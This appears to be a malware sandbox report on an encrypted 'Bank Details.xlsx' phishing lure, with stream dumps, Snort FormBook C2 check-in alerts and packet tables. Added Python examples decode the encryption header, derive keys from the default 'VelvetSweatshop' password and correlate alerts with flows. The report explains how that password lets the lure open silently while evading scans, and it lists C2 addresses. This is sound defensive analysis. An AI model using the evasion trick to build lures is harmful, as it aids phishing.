SHA512: c7647059aa1e3e79a8652cd326eecc09dc3eef5a7b9ec33f803947151973a657c09d3c143874c2de10205ca21168eabc5839599e11c90ea009acb58748f1004d
SSDEEP: 49152:wVVV5zlhInzv53nKjtllZ7uYOg0BkIakbTOWkaBfId3wQjHJ/wJ3p:wx7azvGt7JuBekbCWkKfMZdk5

                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                    Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                                                                    Static OLE Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Document Type:OLE
                                                                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                                                                    OLE File "Bank Details.xlsx"

                                                                                                                                                                                                    Indicators

                                                                                                                                                                                                    Has Summary Info:False
                                                                                                                                                                                                    Application Name:unknown
                                                                                                                                                                                                    Encrypted Document:True
                                                                                                                                                                                                    Contains Word Document Stream:False
                                                                                                                                                                                                    Contains Workbook/Book Stream:False
                                                                                                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                                                                                                    Contains Visio Document Stream:False
                                                                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                                                                    Flash Objects Count:
                                                                                                                                                                                                    Contains VBA Macros:False

                                                                                                                                                                                                    Streams

                                                                                                                                                                                                    Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:64
                                                                                                                                                                                                    Entropy:2.73637206947
                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                    Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                                                                    Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                                                                    Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:112
                                                                                                                                                                                                    Entropy:2.7597816111
                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                    Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                                                                    Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type: data
Stream Size: 200
Entropy: 3.13335930328
Base64 Encoded: False
Data ASCII: X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: 58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
Stream Path: \x6DataSpaces/Version
File Type: data
Stream Size: 76
Entropy: 2.79079600998
Base64 Encoded: False
Data ASCII: < . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw: 3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
Stream Path: EncryptedPackage
File Type: data
Stream Size: 2347736
Entropy: 7.99971479672
Base64 Encoded: True
Data ASCII: . . # . . . . . . . . . . . . ` r . / | # > 3 l . . . . . . . . t . . . d ! / . D . z f . . . x . / x . . . . v . Q c . . . U c . . . & x . w * K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . . . g . u $ . R Z K E S . . + . .
Data Raw: cb d2 23 00 00 00 00 00 9a 95 f5 1a 85 83 e3 60 72 96 2f 7c 23 3e 33 6c c6 0f c8 f5 93 fc ff 87 74 1c d7 89 64 21 2f d5 44 ab 7a 66 e2 a7 00 78 03 2f 78 af a9 cb af 76 e9 51 63 97 0a 83 55 63 fa 9c eb 26 78 90 77 2a 4b 45 53 e6 99 2b b9 1d fa 67 fc 75 24 2e 52 5a 4b 45 53 e6 99 2b b9 1d fa 67 fc 75 24 2e 52 5a 4b 45 53 e6 99 2b b9 1d fa 67 fc 75 24 2e 52 5a 4b 45 53 e6 99 2b b9 1d
Stream Path: EncryptionInfo
File Type: data
Stream Size: 224
Entropy: 4.49244460605
Base64 Encoded: False
Data ASCII: . . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . ; . g . . . i . 2 . . # 6 # B t . . . . D . < { k T I . . . . . . . ? . . . t . p . . . . . . . . . . . . s . . . . . . . . . . .
Data Raw: 04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00
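The four streams above (the \x6 prefix is the 0x06 byte that starts the DataSpaces storage names) are the layout of an OOXML package protected with ECMA-376 "Standard Encryption": EncryptionInfo carries the header and password verifier, EncryptedPackage carries the workbook zip encrypted with AES in ECB mode. Two things in the dumps are worth reading off by hand. The EncryptionInfo header starts with version 4.2, flags 0x24 (fCryptoAPI | fAES), AlgID 0x660E (AES-128), AlgIDHash 0x8004 (SHA-1), a 128-bit key and ProviderType 0x18, followed by the CSP name; the EncryptedPackage stream starts with the plaintext package size as a 64-bit little-endian integer (0x23d2cb = 2347723 bytes, which padded to a 16-byte block plus the 8-byte prefix gives exactly the 2347736-byte stream size). The repeated 16-byte run "4b 45 53 e6 99 2b ..." in the EncryptedPackage dump is an ECB artifact: identical plaintext blocks encrypt to identical ciphertext blocks, and the near-8.0 entropy is ciphertext, not base64 text. The script below is an added example, not code from the report: it parses these fields from the bytes the report shows (the EncryptionInfo dump stops at 128 bytes, so the CSP name is cut off mid-word on purpose) and implements the MS-OFFCRYPTO password-to-key derivation for the password Excel tries silently before prompting, "VelvetSweatshop", which is why this lure opens without a password dialog while the ciphertext defeats static scanning. The salt is constructed, because the report's dump ends before the verifier block, and the function and constant names are this example's own.

```python
"""Decode the EncryptionInfo and EncryptedPackage streams of an OOXML
'Standard Encryption' container and derive the AES key for a password.

Added example; not code from the sandbox report. Byte strings marked
'from the report' are copied from its Data Raw dumps, the salt is
constructed, and the layout follows MS-OFFCRYPTO (Standard Encryption,
SHA-1, 50000 spins).
"""
import hashlib
import struct

# From the report: first 44 bytes of the EncryptionInfo dump (the fixed part
# of the header) plus the UTF-16LE CSP name the dump shows before it is cut
# off at 128 bytes ("...Cryptograph"), so the name is truncated on purpose.
ENCRYPTION_INFO_PREFIX = bytes.fromhex(
    "04000200 24000000 8c000000"           # vMajor=4 vMinor=2, Flags, HeaderSize=140
    "24000000 00000000 0e660000 04800000"  # Flags, SizeExtra, AlgID, AlgIDHash
    "80000000 18000000 00000000 00000000"  # KeySize, ProviderType, Reserved1/2
) + "Microsoft Enhanced RSA and AES Cryptograph".encode("utf-16-le")

# From the report: first 8 bytes of the EncryptedPackage dump.
ENCRYPTED_PACKAGE_PREFIX = bytes.fromhex("cb d2 23 00 00 00 00 00")

# Password Excel tries silently before prompting the user.
DEFAULT_EXCEL_PASSWORD = "VelvetSweatshop"

# EncryptionHeader.Flags bits and the AlgID / AlgIDHash values used here.
F_CRYPTOAPI, F_DOCPROPS, F_EXTERNAL, F_AES = 0x04, 0x08, 0x10, 0x20
ALG_NAMES = {0x6801: "RC4", 0x660E: "AES-128", 0x660F: "AES-192", 0x6610: "AES-256"}
HASH_NAMES = {0x8004: "SHA-1"}


def parse_encryption_info(data):
    """Decode the version, flags and EncryptionHeader at the start of the
    EncryptionInfo stream. Tolerates a truncated dump: the CSP name is read
    up to its NUL terminator or to the end of the available bytes."""
    v_major, v_minor, flags, header_size = struct.unpack_from("<HHII", data, 0)
    if v_minor != 2 or v_major not in (2, 3, 4):
        raise ValueError(f"not a Standard Encryption stream (version {v_major}.{v_minor})")
    h_flags, _size_extra, alg_id, alg_id_hash, key_bits, provider_type = struct.unpack_from("<6I", data, 12)
    verifier_offset = 12 + header_size
    csp_name = data[44:verifier_offset].decode("utf-16-le", errors="ignore").split("\x00", 1)[0]
    return {
        "version": (v_major, v_minor),
        "flags": flags,
        "aes": bool(h_flags & F_AES),
        "alg_id": alg_id,
        "algorithm": ALG_NAMES.get(alg_id, hex(alg_id)),
        "alg_id_hash": alg_id_hash,
        "hash": HASH_NAMES.get(alg_id_hash, hex(alg_id_hash)),
        "key_bits": key_bits,
        "provider_type": provider_type,
        "csp_name": csp_name,
        "verifier_offset": verifier_offset,        # where EncryptionVerifier starts
        "truncated": len(data) < verifier_offset,  # dump ends before the verifier
    }


def derive_standard_key(salt, password, key_bits, spin_count=50000):
    """MS-OFFCRYPTO 2.3.4.7: turn a password into the AES key for Standard
    Encryption. H0 = SHA1(salt || pw_utf16le); Hn = SHA1(n || Hn-1) for
    spin_count rounds; Hfinal = SHA1(Hn || 0x00000000); key = SHA1(Hfinal
    XORed into a 64-byte 0x36 buffer)[:key_len], with a second 0x5C buffer
    only when the key is longer than one hash output."""
    h = hashlib.sha1(salt + password.encode("utf-16-le")).digest()
    for n in range(spin_count):
        h = hashlib.sha1(struct.pack("<I", n) + h).digest()
    h_final = hashlib.sha1(h + struct.pack("<I", 0)).digest()
    x1 = hashlib.sha1(bytes(b ^ 0x36 for b in h_final.ljust(64, b"\x00"))).digest()
    key_len = key_bits // 8
    if key_len <= len(x1):
        return x1[:key_len]
    x2 = hashlib.sha1(bytes(b ^ 0x5C for b in h_final.ljust(64, b"\x00"))).digest()
    return (x1 + x2)[:key_len]


def encrypted_package_length(prefix):
    """The EncryptedPackage stream starts with the plaintext package size as
    a little-endian uint64; the AES-ECB ciphertext that follows is padded to
    whole 16-byte blocks."""
    return struct.unpack_from("<Q", prefix, 0)[0]


def padded_to_block(n, block=16):
    return (n + block - 1) // block * block


if __name__ == "__main__":
    hdr = parse_encryption_info(ENCRYPTION_INFO_PREFIX)
    print(hdr["version"], hdr["algorithm"], hdr["hash"], hdr["key_bits"], repr(hdr["csp_name"]))
    plain = encrypted_package_length(ENCRYPTED_PACKAGE_PREFIX)
    print("package", plain, "bytes; stream should be", 8 + padded_to_block(plain))
    salt = bytes(range(16))  # constructed: the report's dump stops before the real salt
    print(derive_standard_key(salt, DEFAULT_EXCEL_PASSWORD, hdr["key_bits"]).hex())
```

To actually confirm the password you would read the EncryptionVerifier that starts at offset 152 (salt size, 16-byte salt, 16-byte EncryptedVerifier, hash size, 32-byte EncryptedVerifierHash), decrypt the two encrypted fields with AES-128-ECB under the derived key, and compare SHA-1 of the decrypted verifier with the first 20 bytes of the decrypted hash; that step needs an AES implementation, which the Python standard library does not ship, so it is left out here. Once the key checks out, the same key decrypts EncryptedPackage block by block, giving back the ordinary xlsx zip that the rest of the report analyses.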

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP        Dest IP
04/12/21-11:39:06.563976  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49171        80         192.168.2.22     34.102.136.180
04/12/21-11:39:06.563976  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49171        80         192.168.2.22     34.102.136.180
04/12/21-11:39:06.563976  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49171        80         192.168.2.22     34.102.136.180
04/12/21-11:39:06.765571  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49171      34.102.136.180   192.168.2.22
04/12/21-11:39:49.934220  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49177        80         192.168.2.22     3.230.51.235
04/12/21-11:39:49.934220  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49177        80         192.168.2.22     3.230.51.235
04/12/21-11:39:49.934220  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49177        80         192.168.2.22     3.230.51.235
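The alert table reads as one story only once the rows are grouped by connection: three ET check-in signatures fire on the outbound GET from port 49171, the server 34.102.136.180 answers that same connection with a 403, and about 43 seconds later the sample repeats the check-in on port 49177 against the next C2 host, 3.230.51.235. Snort lists the 403 with source and destination swapped, so a naive join on (src, dst) splits the two halves of one connection. The script below is an added example, not part of the report: it keys flows on the sandbox host's side of the 5-tuple so both directions land in one bucket, joins the report's alert rows to the flows, summarizes the first rows of the TCP packet table (the 49171 and 49177 connections that raised the alerts lie outside the excerpt of the packet list shown here), and measures the gap between the two C2 contacts. The row tuples are copied from the report; the function names and the "refused" heuristic are this example's own.

```python
"""Correlate Snort alerts with TCP flows from a sandbox packet list.

Added example, not part of the sandbox report. Alert and packet rows are
copied from the report's tables (packets: first rows only); the flow key
convention and the 'refused' heuristic are this example's construction.
"""
from collections import defaultdict
from datetime import datetime

SANDBOX_HOST = "192.168.2.22"

# (timestamp, proto, sid, message, src_port, dst_port, src_ip, dst_ip) from the report
ALERTS = [
    ("04/12/21-11:39:06.563976", "TCP", 2031453, "ET TROJAN FormBook CnC Checkin (GET)", 49171, 80, "192.168.2.22", "34.102.136.180"),
    ("04/12/21-11:39:06.563976", "TCP", 2031449, "ET TROJAN FormBook CnC Checkin (GET)", 49171, 80, "192.168.2.22", "34.102.136.180"),
    ("04/12/21-11:39:06.563976", "TCP", 2031412, "ET TROJAN FormBook CnC Checkin (GET)", 49171, 80, "192.168.2.22", "34.102.136.180"),
    ("04/12/21-11:39:06.765571", "TCP", 1201, "ATTACK-RESPONSES 403 Forbidden", 80, 49171, "34.102.136.180", "192.168.2.22"),
    ("04/12/21-11:39:49.934220", "TCP", 2031453, "ET TROJAN FormBook CnC Checkin (GET)", 49177, 80, "192.168.2.22", "3.230.51.235"),
    ("04/12/21-11:39:49.934220", "TCP", 2031449, "ET TROJAN FormBook CnC Checkin (GET)", 49177, 80, "192.168.2.22", "3.230.51.235"),
    ("04/12/21-11:39:49.934220", "TCP", 2031412, "ET TROJAN FormBook CnC Checkin (GET)", 49177, 80, "192.168.2.22", "3.230.51.235"),
]

# (timestamp, src_port, dst_port, src_ip, dst_ip): first rows of the report's TCP packet table
PACKETS = [
    ("Apr 12, 2021 11:38:06.504285097 CEST", 49167, 443, "192.168.2.22", "52.59.165.42"),
    ("Apr 12, 2021 11:38:06.547945023 CEST", 443, 49167, "52.59.165.42", "192.168.2.22"),
    ("Apr 12, 2021 11:38:06.548108101 CEST", 49167, 443, "192.168.2.22", "52.59.165.42"),
    ("Apr 12, 2021 11:38:06.562624931 CEST", 49167, 443, "192.168.2.22", "52.59.165.42"),
    ("Apr 12, 2021 11:38:06.604636908 CEST", 443, 49167, "52.59.165.42", "192.168.2.22"),
    ("Apr 12, 2021 11:38:08.444669962 CEST", 49170, 80, "192.168.2.22", "103.141.138.117"),
    ("Apr 12, 2021 11:38:08.699580908 CEST", 80, 49170, "103.141.138.117", "192.168.2.22"),
    ("Apr 12, 2021 11:38:08.700056076 CEST", 49170, 80, "192.168.2.22", "103.141.138.117"),
]


def parse_packet_ts(ts):
    """'Apr 12, 2021 11:38:06.504285097 CEST' -> datetime; nanoseconds are
    truncated to the microseconds strptime can represent, zone dropped."""
    stamp, _zone = ts.rsplit(" ", 1)
    head, frac = stamp.split(".")
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_alert_ts(ts):
    """'04/12/21-11:39:06.563976' -> datetime (Snort's default alert format)."""
    return datetime.strptime(ts, "%m/%d/%y-%H:%M:%S.%f")


def flow_key(src_ip, src_port, dst_ip, dst_port):
    """Direction-agnostic key: the sandbox host's endpoint always comes first,
    so request and response packets of one connection share a bucket."""
    if src_ip == SANDBOX_HOST:
        return (src_ip, src_port, dst_ip, dst_port)
    return (dst_ip, dst_port, src_ip, src_port)


def summarize_flows(packets):
    """Packet count per direction and first/last timestamp for each flow."""
    flows = {}
    for ts, sport, dport, sip, dip in packets:
        t = parse_packet_ts(ts)
        f = flows.setdefault(flow_key(sip, sport, dip, dport),
                             {"packets": 0, "out": 0, "in": 0, "first": t, "last": t})
        f["packets"] += 1
        f["out" if sip == SANDBOX_HOST else "in"] += 1
        f["first"], f["last"] = min(f["first"], t), max(f["last"], t)
    return flows


def c2_verdicts(alerts):
    """Group alerts per flow. A flow is a C2 contact when a check-in rule
    fired on the outbound side; it is 'refused' when the server answered the
    same connection with a 403. Returns {server_ip: summary}."""
    per_flow = defaultdict(lambda: {"server": None, "checkin_sids": set(),
                                    "refused": False, "first_seen": None})
    for ts, _proto, sid, msg, sport, dport, sip, dip in alerts:
        key = flow_key(sip, sport, dip, dport)
        entry = per_flow[key]
        entry["server"] = key[2]
        t = parse_alert_ts(ts)
        entry["first_seen"] = t if entry["first_seen"] is None else min(entry["first_seen"], t)
        if sip == SANDBOX_HOST and "CnC Checkin" in msg:
            entry["checkin_sids"].add(sid)
        if dip == SANDBOX_HOST and "403 Forbidden" in msg:
            entry["refused"] = True
    return {v["server"]: v for v in per_flow.values() if v["checkin_sids"]}


def seconds_between_contacts(verdicts, first_server, second_server):
    """Delay between the first alert on one C2 host and the first on the next."""
    return (verdicts[second_server]["first_seen"] - verdicts[first_server]["first_seen"]).total_seconds()


if __name__ == "__main__":
    for key, f in summarize_flows(PACKETS).items():
        print(key, f["packets"], "pkts", f["out"], "out", f["in"], "in")
    for server, v in c2_verdicts(ALERTS).items():
        print(server, sorted(v["checkin_sids"]), "refused" if v["refused"] else "accepted")
    print(seconds_between_contacts(c2_verdicts(ALERTS), "34.102.136.180", "3.230.51.235"), "s between C2 hosts")
```

The same join works on a full pcap export: feed it every packet row instead of the excerpt and the per-flow counts tell you which of the alerted connections carried a body (the FormBook check-in is a GET, so the volume is small) and whether the second host ever answered, which the alert table alone cannot show.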

Network Port Distribution

TCP Packets

Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Apr 12, 2021 11:38:06.504285097 CEST  49167        443        192.168.2.22     52.59.165.42
Apr 12, 2021 11:38:06.547945023 CEST  443          49167      52.59.165.42     192.168.2.22
Apr 12, 2021 11:38:06.548108101 CEST  49167        443        192.168.2.22     52.59.165.42
Apr 12, 2021 11:38:06.562624931 CEST  49167        443        192.168.2.22     52.59.165.42
Apr 12, 2021 11:38:06.604636908 CEST  443          49167      52.59.165.42     192.168.2.22
Apr 12, 2021 11:38:06.606322050 CEST  443          49167      52.59.165.42     192.168.2.22
Apr 12, 2021 11:38:06.606375933 CEST  443          49167      52.59.165.42     192.168.2.22
Apr 12, 2021 11:38:06.606409073 CEST  443          49167      52.59.165.42     192.168.2.22
Apr 12, 2021 11:38:06.606415033 CEST  49167        443        192.168.2.22     52.59.165.42
Apr 12, 2021 11:38:06.606452942 CEST  49167        443        192.168.2.22     52.59.165.42
Apr 12, 2021 11:38:06.606456041 CEST  49167        443        192.168.2.22     52.59.165.42
Apr 12, 2021 11:38:06.615592957 CEST  49167        443        192.168.2.22     52.59.165.42
Apr 12, 2021 11:38:06.657550097 CEST  443          49167      52.59.165.42     192.168.2.22
Apr 12, 2021 11:38:06.657638073 CEST  49167        443        192.168.2.22     52.59.165.42
Apr 12, 2021 11:38:08.318805933 CEST  49167        443        192.168.2.22     52.59.165.42
Apr 12, 2021 11:38:08.375102997 CEST  443          49167      52.59.165.42     192.168.2.22
Apr 12, 2021 11:38:08.375181913 CEST  49167        443        192.168.2.22     52.59.165.42
Apr 12, 2021 11:38:08.444669962 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:08.699580908 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:08.700056076 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:08.700448990 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:08.963999033 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:08.964063883 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:08.964097977 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:08.964113951 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:08.964126110 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:08.964154005 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:08.964209080 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.218404055 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.218450069 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.218488932 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.218527079 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.218565941 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.218591928 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.218594074 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.218648911 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.218692064 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.218693018 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.218729973 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.218730927 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.218774080 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.218779087 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.218813896 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.474692106 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.474750996 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.474792004 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.474828959 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.474849939 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.474877119 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.474889994 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.474895954 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.474900007 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.474919081 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.474920034 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.474956989 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.474966049 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.474992037 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.474994898 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.475033045 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.475071907 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.475112915 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.475152016 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.475151062 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.475199938 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.475207090 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.475241899 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.475244045 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.475246906 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.475250959 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.475276947 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.475281954 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.475281954 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.475322962 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.475323915 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.475369930 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.475611925 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.729712963 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.729774952 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.729816914 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.729859114 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.729907036 CEST  80           49170      103.141.138.117  192.168.2.22
Apr 12, 2021 11:38:09.729942083 CEST  49170        80         192.168.2.22     103.141.138.117
Apr 12, 2021 11:38:09.729949951 CEST  80           49170      103.141.138.117  192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.729984999 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.729988098 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.729990959 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.729995012 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.729999065 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730021000 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730027914 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730034113 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730068922 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730086088 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730113029 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730118036 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730151892 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730161905 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730191946 CEST8049170103.141.138.117192.168.2.22
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730195999 CEST4917080192.168.2.22103.141.138.117
                                                                                                                                                                                                    Apr 12, 2021 11:38:09.730237961 CEST8049170103.141.138.117192.168.2.22

UDP Packets


DNS Queries


DNS Answers


HTTP Request Dependency Graph


